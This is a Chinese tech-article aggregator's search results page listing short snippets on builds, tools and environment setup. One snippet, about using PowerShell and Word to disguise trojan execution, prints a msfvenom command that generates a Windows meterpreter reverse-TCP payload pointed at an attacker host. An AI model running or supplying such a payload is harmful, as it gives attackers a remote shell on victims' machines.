码迷,mamicode.com
首页 >  
搜索关键字:release x64    ( 15919个结果
curl http3
Build quiche and BoringSSL: % git clone --recursive https://github.com/cloudflare/quiche % cd quiche % cargo build --release --features ffi,pkg-config ...
分类:Web程序   时间:2021-03-29 11:40:19    阅读次数:0
Github 1.9K Star的数据治理框架-Amundsen
Amundsen的使命,整理有关数据的所有信息,并使其具有普遍适用性。 这是Amundsen官网的一句话,对于元数据的管理工作,复杂且繁琐。可用的工具很多各有千秋,数据血缘做的较好的应该是Apache Atlas,而数据可视化做的较好的应该是Apache Superset。业界一直需要一个可以整合这 ...
分类:其他好文   时间:2021-03-26 15:12:41    阅读次数:0
Passpoint测试查询到的官方指导,先存后看防遗失
wpa_supplicant and Hotspot 2.0 This document describe how the IEEE 802.11u Interworking and Wi-Fi Hotspot 2.0 (Release 1) implementation in wpa_suppli ...
分类:其他好文   时间:2021-03-18 14:15:04    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
嵌入式开发环境搭建
STM32 windows10 x64 开发环境搭建 硬件连接 开发板(电源口)←12V 2A直流电源 开发板(RS232口)←USB转RS232线←电脑(USB口) 开发板(SWG口)←JTAG转SWG的转接板←ST-LINK←USB转Mini-USB-typeB线←电脑(USB口) 下载并安装K ...
分类:其他好文   时间:2021-03-17 14:38:21    阅读次数:0
React DevTools
原文:https://reactjs.org/blog/2019/08/15/new-react-devtools.html Introducing the New React DevTools We are excited to announce a new release of the Reac ...
分类:其他好文   时间:2021-03-17 14:05:07    阅读次数:0
该虚拟机似乎正在使用中,请获取所有权
找到虚拟机目录,将后缀为.lck的文件夹直接重命名,将文件夹Windows 10 x64.vmx.lck改为Windows 10 x64.vmx.lck.backup。 ...
分类:其他好文   时间:2021-03-16 13:55:47    阅读次数:0
vscode源码的打包与发布
首先引用官方文档 # Packaging VS Code can be packaged for the following platforms: win32-ia32 | win32-x64 | darwin | linux-ia32 | linux-x64 | linux-arm These g ...
分类:其他好文   时间:2021-03-15 10:47:18    阅读次数:0
php之yum安装
线上PHP环境的安装一般使用编译的方式,但是需要手动一个一个安装,这次使用yum来进行安装 1.安装EPEL源 rpm -ivh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm 或者 yum install ...
分类:Web程序   时间:2021-03-11 20:48:12    阅读次数:0
利用SAMKeyChain生成唯一设备号
1、背景 由于传统已知的三种方法获取uuid都不能保证它唯一不变,那么我们可以利用钥匙串服务,来生成并存储一个唯一不变的字符,作为唯一的设备id. /** 利用CFUUIDCreateString函数生产UUID, 卸载应用重新安装后会不一致*/ + (NSString *)getUUID{ CFU ...
分类:其他好文   时间:2021-03-10 13:09:09    阅读次数:0
15919条   上一页 1 ... 9 10 11 12 13 ... 1592 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!